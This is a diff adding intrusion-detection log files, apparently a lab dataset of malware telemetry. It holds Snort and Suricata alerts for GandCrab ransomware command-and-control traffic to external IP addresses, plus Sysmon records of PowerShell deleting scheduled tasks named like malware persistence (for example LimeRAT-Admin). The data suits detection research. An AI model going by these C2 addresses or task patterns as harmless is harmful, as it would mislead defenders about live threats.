[Priority: 1] {TCP} 172.16.2.2:50148 -> 172.67.184.106:80","/var/log/snort/alert.fast" +"May 29, 2020 @ 12:30:22.232","05/29/2020-12:30:20.567626 [**] [1:2010067:10] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50148 -> 172.67.184.106:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:30:15.231","05/29-12:30:12.839844 [**] [1:2025638:4] ET TROJAN [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50108 -> 77.104.144.25:80","/var/log/snort/alert.fast" +"May 29, 2020 @ 12:30:15.231","05/29-12:30:12.839844 [**] [1:2010067:9] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50108 -> 77.104.144.25:80","/var/log/snort/alert.fast" +"May 29, 2020 @ 12:30:15.230","05/29/2020-12:30:10.000422 [**] [1:2010067:10] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50044 -> 204.11.56.48:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:30:15.230","05/29/2020-12:30:10.000422 [**] [1:2025638:3] ET MALWARE [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50044 -> 204.11.56.48:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:30:15.230","05/29/2020-12:30:11.000714 [**] [1:2010067:10] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50048 -> 204.11.56.48:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:30:15.230","05/29/2020-12:30:13.102669 [**] [1:2010067:10] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50108 -> 77.104.144.25:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:28:45.216","05/29-12:28:43.539075 [**] [1:2010067:9] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49984 -> 92.53.96.201:80","/var/log/snort/alert.fast" +"May 29, 2020 @ 12:28:45.215","05/29/2020-12:28:43.699392 [**] [1:2010067:10] ET POLICY Data POST to an image file (jpg) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49984 -> 92.53.96.201:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:28:45.215","05/29/2020-12:28:43.699392 [**] [1:2025638:3] ET MALWARE [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49984 -> 92.53.96.201:80","/var/log/suricata/fast.log" +"May 29, 2020 @ 12:28:45.215","05/29-12:28:43.539075 [**] [1:2025638:4] ET TROJAN [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49984 -> 92.53.96.201:80","/var/log/snort/alert.fast" diff --git a/data/MW_24_HIDS_3.csv b/data/MW_24_HIDS_3.csv new file mode 100644 index 0000000..01e2fa2 --- /dev/null +++ b/data/MW_24_HIDS_3.csv @@ -0,0 +1,28 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 29, 2020 @ 13:13:51.370",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '7fa7290c3b0e7b2d8ed5a092299db356' +New md5sum is : '7b0e21ee99623454e8d06871f064ed98' +Old sha1sum was: '27735fff26a4f9093576dfbd77d06599094d3497' +New sha1sum is : 'f63735bbc2e72216030f4e994b7c9785856a9170' +", +"May 29, 2020 @ 13:11:24.587",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '7b0e21ee99623454e8d06871f064ed98' +New md5sum is : '7fa7290c3b0e7b2d8ed5a092299db356' +Old sha1sum was: 'f63735bbc2e72216030f4e994b7c9785856a9170' +New sha1sum is : '27735fff26a4f9093576dfbd77d06599094d3497' +", +"May 29, 2020 @ 13:11:23.463",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '2cf3ce4970fb25f9237c226b8de91a23' +New md5sum is : 'f6ca07d87221fc6857f68c29d1d4417a' +Old sha1sum was: '8f5edce88e798c3b3085f743cc79f804540ea6ae' +New sha1sum is : '6cb461f02b7157b4c53566f2f9182bf18d0fc230' +", +"May 29, 2020 @ 13:11:23.429",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '758365bbcd458b2a523c7ab4132c04af' +New md5sum is : 'f8206196eadb30fd99582bb7dd32d415' +Old sha1sum was: '691b9f4c6de22a25538af85b815563825e93ed4f' +New sha1sum is : '60905a2da095cef03af60ac4320a83eebfc04a12' +", +"May 29, 2020 @ 13:09:55.800",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,, +"May 29, 2020 @ 13:09:45.788",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 29, 2020 @ 13:06:06.572",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = DESKTOP-HUE026H\John Williams; ClientProcessId = 6448; Component = Unknown; Operation = Start IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_Bios; ResultCode = 0x80041032; PossibleCause = Unknown""",,,, diff --git a/data/MW_24_NIDS.csv b/data/MW_24_NIDS.csv new file mode 100644 index 0000000..583be86 --- /dev/null +++ b/data/MW_24_NIDS.csv @@ -0,0 +1,3 @@ +"@timestamp",message,"log.file.path" +"May 29, 2020 @ 13:10:55.801","05/29-13:10:54.291134 [**] [1:2014819:1] ET INFO Packed Executable Download [**] [Classification: Misc activity] [Priority: 3] {TCP} 173.194.144.25:80 -> 172.16.2.2:49692","/var/log/snort/alert.fast" +"May 29, 2020 @ 13:09:20.791","05/29-13:09:12.995986 [**] [1:2014819:1] ET INFO Packed Executable Download [**] [Classification: Misc activity] [Priority: 3] {TCP} 173.194.144.25:80 -> 172.16.2.2:50154","/var/log/snort/alert.fast" diff --git a/data/MW_25_HIDS_3.csv b/data/MW_25_HIDS_3.csv new file mode 100644 index 0000000..197a325 --- /dev/null +++ b/data/MW_25_HIDS_3.csv @@ -0,0 +1,23321 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 29, 2020 @ 14:23:40.603",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '7fa7290c3b0e7b2d8ed5a092299db356' +New md5sum is : '7b0e21ee99623454e8d06871f064ed98' +Old sha1sum was: '27735fff26a4f9093576dfbd77d06599094d3497' +New sha1sum is : 'f63735bbc2e72216030f4e994b7c9785856a9170' +", +"May 29, 2020 @ 14:21:10.763",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:42.141 +ProcessGuid: {df9fc3d3-b41a-5ecf-0000-0010627d3100} +ProcessId: 4220 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ECDnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:42.146393800Z"",""eventRecordID"":""3983"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:42.141\r\nProcessGuid: {df9fc3d3-b41a-5ecf-0000-0010627d3100}\r\nProcessId: 4220\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:42.141"",""processGuid"":""{df9fc3d3-b41a-5ecf-0000-0010627d3100}"",""processId"":""4220"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ECDnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.749",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:42.086 +ProcessGuid: {df9fc3d3-b41a-5ecf-0000-0010507b3100} +ProcessId: 7788 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:42.097003800Z"",""eventRecordID"":""3982"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:42.086\r\nProcessGuid: {df9fc3d3-b41a-5ecf-0000-0010507b3100}\r\nProcessId: 7788\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:42.086"",""processGuid"":""{df9fc3d3-b41a-5ecf-0000-0010507b3100}"",""processId"":""7788"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.732",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:42.034 +ProcessGuid: {df9fc3d3-b41a-5ecf-0000-00108a793100} +ProcessId: 1820 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for Windows Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:42.038215100Z"",""eventRecordID"":""3981"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:42.034\r\nProcessGuid: {df9fc3d3-b41a-5ecf-0000-00108a793100}\r\nProcessId: 1820\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:42.034"",""processGuid"":""{df9fc3d3-b41a-5ecf-0000-00108a793100}"",""processId"":""1820"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for Windows Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.721",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.971 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-0010d8773100} +ProcessId: 6008 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.976759600Z"",""eventRecordID"":""3980"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.971\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-0010d8773100}\r\nProcessId: 6008\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:41.971"",""processGuid"":""{df9fc3d3-b419-5ecf-0000-0010d8773100}"",""processId"":""6008"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:10.702",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:41.923 +ProcessGuid: {df9fc3d3-b419-5ecf-0000-001042763100} +ProcessId: 8076 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN LimeRAT-Admin /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:41.927492800Z"",""eventRecordID"":""3979"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:41.923\r\nProcessGuid: {df9fc3d3-b419-5ecf-0000-001042763100}\r\nProcessId: 8076\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 